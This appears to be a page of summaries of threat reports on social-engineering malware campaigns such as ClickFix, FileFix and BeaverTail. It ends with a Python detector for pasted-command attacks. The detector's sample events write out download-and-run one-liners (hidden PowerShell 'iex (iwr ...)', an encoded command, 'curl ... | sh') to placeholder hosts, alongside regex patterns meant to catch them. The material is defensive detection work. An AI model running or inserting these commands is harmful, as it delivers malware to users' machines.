The North Korean group UNC1069 has intensified its focus on financial institutions, using AI tools to support social engineering attacks. The group deploys new malware families to compromise victims and steal sensitive data, including credentials and browser-stored information.
UNC1069, a North Korean threat group, has been exploiting social engineering tactics and AI tools to infiltrate cryptocurrency companies. Their recent attack involved a compromised Telegram account, a fake Zoom meeting with a deepfake video, and multiple malware families to harvest sensitive data. The operation highlights a significant evolution in their methods since 2018.
A new report reveals that the TamperedChef malware campaign tricks users into downloading malicious installers disguised as legitimate software. The attackers use social engineering techniques and compromised code-signing certificates to deliver a JavaScript backdoor that enables remote access and control. Affected sectors include healthcare, construction, and manufacturing, with a concentration of infections in the U.S.
This article details an organized cybercriminal operation that primarily targets cryptocurrency users and Web3 employees through sophisticated malware and social engineering tactics. The gang, linked to multiple traffer groups, has generated at least $2.4 million in theft, using fake applications and extensive infrastructure to deliver their attacks.
Microsoft identified an updated ClickFix campaign that disrupts users' browsers and tricks them into executing harmful commands. This variant combines social engineering with abuse of native Windows utilities (living-off-the-land binaries) to deliver a Python RAT payload while evading traditional detection methods.
The latest version of the 'Crocodilus' Android malware now includes a feature that adds fake contacts to infected devices, allowing attackers to spoof trusted callers and enhance their social engineering tactics. Initially identified in Turkey, the malware has expanded its reach globally and incorporates advanced evasion techniques to avoid detection while stealing sensitive data. Android users are advised to exercise caution and download only from trusted sources to mitigate risks.
A North Korean hacking group, dubbed Elusive Comet, has been caught using Zoom's remote control feature to hijack victims' computers during seemingly legitimate business calls. By employing social engineering tactics, they trick individuals into granting remote access, allowing malware installation and data exfiltration.
A new FileFix social engineering attack mimics Meta account suspension alerts to deceive users into installing the StealC infostealer malware. It uses a multi-language phishing page that instructs victims to paste a disguised PowerShell command into the File Explorer address bar, which runs it and ultimately executes malicious code hidden inside a JPG image. Acronis highlights the evolution of this attack method and emphasizes the need for heightened awareness of such phishing tactics.
A sophisticated phishing scheme named BeaverTail masquerades as a job offer for an AI engineering role, tricking developers into executing malicious code from a fake GitHub repository. This malware operates in five stages, stealing sensitive information, establishing remote access, and deploying additional malicious components while exploiting trust through social engineering tactics.
A new campaign utilizing ClickFix attacks is now targeting both Windows and Linux systems, with the threat group APT36 adapting social engineering tactics to trick users into executing malicious commands. The Linux variant involves redirecting victims to a CAPTCHA page that prompts them to run a benign command, potentially paving the way for future attacks. Users are advised to avoid executing unknown commands to mitigate the risk of malware infections.
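The ClickFix and FileFix entries above share one execution pattern: the victim pastes a one-liner that a shell runs on their behalf, launched from an unusual parent such as File Explorer (FileFix address bar) or ending in a download-and-run idiom such as `curl ... | sh` (the Linux variant). The following detection heuristic is an added example for this link list, not code from Microsoft, Acronis, or any of the reports summarized here. The process-creation records, field names, lure-parent list, and command-line patterns are this example's own assumptions, constructed to show how such a rule can be written and tested; tune them against your own telemetry before relying on them.

```python
"""Heuristic detector for ClickFix / FileFix-style pasted-command execution.

Added example, not code from any report on this page. The events below are
constructed Sysmon-style process-creation records; every field name,
parent-process list and regex here is an assumption for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str  # parent process executable name, lowercase
    image: str         # child process executable name, lowercase
    command_line: str


# Interpreters that would run a pasted one-liner.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "bash", "sh"}

# Parents that rarely have a legitimate reason to spawn a shell with a
# download-and-run command line. explorer.exe hosts both the File Explorer
# address bar (FileFix) and the Win+R Run dialog (ClickFix). Assumed list.
LURE_PARENTS = {"explorer.exe"}

# Command-line fragments typical of pasted lures (assumed patterns).
SUSPICIOUS = [
    re.compile(r"(?i)\s-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden"),
    re.compile(r"(?i)\biex\b|invoke-expression"),
    re.compile(r"(?i)https?://\S+"),
    re.compile(r"(?i)\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
    re.compile(r"(?i)\.(?:jpg|jpeg|png)\b"),  # payload staged in an image
]


def score(ev: ProcEvent) -> list[str]:
    """Return the reasons an event looks like a pasted lure (empty if none)."""
    reasons: list[str] = []
    if ev.image not in SHELLS:
        return reasons
    if ev.parent_image in LURE_PARENTS:
        reasons.append(f"shell spawned by {ev.parent_image}")
    for pat in SUSPICIOUS:
        if pat.search(ev.command_line):
            reasons.append(f"command line matches {pat.pattern}")
    return reasons


def detect(events: list[ProcEvent]) -> list[tuple[str, str, list[str]]]:
    """Flag an event when a lure parent plus one pattern, or two patterns
    on their own, are present. Returns (host, image, reasons) per hit."""
    hits = []
    for ev in events:
        reasons = score(ev)
        lure = any(r.startswith("shell spawned") for r in reasons)
        pattern_hits = len(reasons) - (1 if lure else 0)
        if (lure and pattern_hits >= 1) or pattern_hits >= 2:
            hits.append((ev.host, ev.image, reasons))
    return hits


# Constructed sample telemetry (not real captures). Hosts and URLs are fake.
SAMPLE_EVENTS = [
    # FileFix: File Explorer address bar runs a hidden PowerShell fetching a "JPG"
    ProcEvent("ws-01", "explorer.exe", "powershell.exe",
              "powershell -w hidden -c \"iex (iwr 'https://example.invalid/verify.jpg' "
              "-UseBasicParsing).Content\""),
    # ClickFix: Run dialog launches an encoded, hidden PowerShell command
    ProcEvent("ws-02", "explorer.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc "
              "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    # Benign: user opened a prompt from Explorer and listed a folder
    ProcEvent("ws-03", "explorer.exe", "cmd.exe", "cmd.exe /c dir"),
    # Benign: scheduled maintenance script under a service parent
    ProcEvent("srv-01", "services.exe", "powershell.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1"),
    # Linux ClickFix variant: fake CAPTCHA page tells the user to pipe curl into sh
    ProcEvent("dev-03", "gnome-terminal", "bash",
              "bash -c \"curl -fsSL https://example.invalid/captcha.sh | sh\""),
]


if __name__ == "__main__":
    for host, image, reasons in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: {image}")
        for r in reasons:
            print(f"    - {r}")
```

The two-tier rule matters: a shell under explorer.exe alone is normal user activity (the `cmd.exe /c dir` sample is deliberately not flagged), so the lure parent only lowers the bar to one pattern match, while a shell with no unusual parent needs two independent indicators. The Linux case passes on patterns alone because a pasted `curl ... | sh` has no unusual parent to anchor on.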